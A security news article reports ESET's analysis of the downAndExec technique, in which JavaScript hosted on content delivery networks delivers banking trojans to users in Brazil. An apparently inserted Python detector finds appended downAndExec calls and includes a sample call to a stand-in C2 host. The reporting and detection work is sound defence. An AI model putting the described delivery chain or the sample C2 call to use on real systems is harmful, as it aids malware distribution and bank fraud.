
New Attack Abuses CDNs to Spread Malware

Content delivery networks (CDNs) are being increasingly abused to spread malware, courtesy of standards that allow the download and execution of payloads on computers, ESET warns.


The security firm analyzed the downAndExec standard, which makes extensive use of JS scripts and enables the download and execution of malware. In one attack, miscreants were observed using the standard and abusing CDNs to deliver banking threats to users in Brazil, the researchers reveal.

The attack chain starts with social engineering techniques being used to trick victims into executing a malicious application detected as NSIS/TrojanDropper.Agent.CL. This is a malware downloader designed to fetch a single snippet of externally-hosted JS necessary to supplement the execution process.

The JS snippet is hosted on the infrastructure of a CDN provider, which not only provides high bandwidth for payload delivery and command and control (C&C) operations, but also ensures that takedown attempts aren’t immediately successful, as it is impracticable to block the entire CDN domain.

Searching for indicators of compromise is also difficult in such cases, as the affected environments might have a large number of access records made by non-malicious software, the security researchers say.

After the content of said JS snippet is fetched, a function is called to add to the end of the JS snippet a string containing “downAndExec” and two parameters representing the URL where the C&C is hosted, and “x-id” data, which is necessary to download other payloads.

The researchers also discovered that in addition to obfuscation, protection against sandboxing has been implemented as well. Thus, the malicious code isn’t executed if the JS snippet is analyzed separately. Moreover, the script performs a series of checks before executing malicious functions, to make sure that the target machine is of potential interest.
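The appended call and the "analyzed separately" behaviour described above can be illustrated from the defender's side. This is an added example, not code from ESET's analysis: the call syntax `downAndExec("<url>", "<x-id>")`, the sample snippet, the URL and the x-id value are all constructed assumptions, since the article does not reproduce the real strings.

```python
import re
from urllib.parse import urlparse

# Assumed call shape: downAndExec("<url>", "<x-id>"), single or double quotes.
# A bare definition such as `function downAndExec(u, x)` has no quoted
# arguments and is deliberately not matched.
CALL_RE = re.compile(
    r"""downAndExec\s*\(\s*(['"])(?P<url>.*?)\1\s*,\s*(['"])(?P<xid>.*?)\3\s*\)"""
)


def find_down_and_exec(script_text):
    """Return one record per downAndExec(...) call found in script text.

    Meant for script content captured after the downloader has joined the
    pieces (for example from script logging or a memory capture), because
    the CDN-hosted snippet on its own does not contain the call.
    """
    hits = []
    for m in CALL_RE.finditer(script_text):
        url = m.group("url")
        hits.append({
            "c2_url": url,
            "c2_host": urlparse(url).hostname,
            "x_id": m.group("xid"),
            "offset": m.start(),
            # True when nothing but whitespace or ';' follows the call,
            # i.e. it was added to the end of the snippet.
            "at_tail": script_text[m.end():].strip(" ;\r\n\t") == "",
        })
    return hits


# Constructed sample data (not real indicators).
CDN_SNIPPET = "function downAndExec(u, x) { /* body omitted */ }\n"
APPENDED = 'downAndExec("http://c2.example.invalid/gate", "constructed-x-id-0001");'
JOINED = CDN_SNIPPET + APPENDED

if __name__ == "__main__":
    print("CDN snippet alone:", find_down_and_exec(CDN_SNIPPET))
    print("Joined content:   ", find_down_and_exec(JOINED))
```

Scanning only the file hosted on the CDN returns nothing, which is why the check has to run on the joined content; the extracted host and x-id are the values worth pivoting on in proxy and DNS logs.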


The malware checks for various files, after which it starts looking for folders associated with banking programs such as Bradesco, Itaú, Sicoob and Santander. The researchers suggest that this check is probably intended to prevent activation of malicious functions on computers that are not used for online banking.

Finally, the malware also checks whether the target computer is located in Brazil. This shows that the attack is targeted and might also be meant to avoid analysis. The snippet verifies that the customer IP is from a Brazilian AS (autonomous system).

Should the computer meet all conditions, the malware initiates communication with the C&C, which results in the final compromise being performed. In the analyzed incident, the malware downloaded three files, one of which is a banking Trojan.

“As we have seen, the downAndExec technique involves two download stages and several protections, either to identify machines matching the desired profile, or to distribute malicious code in ‘sterile’ sections, which on their own do not execute (in order to bypass online protections), but which, when joined with other pieces of malicious code, are capable of compromising a victim’s computers,” ESET concludes.


Written By

Ionut Arghire is an international correspondent for SecurityWeek.
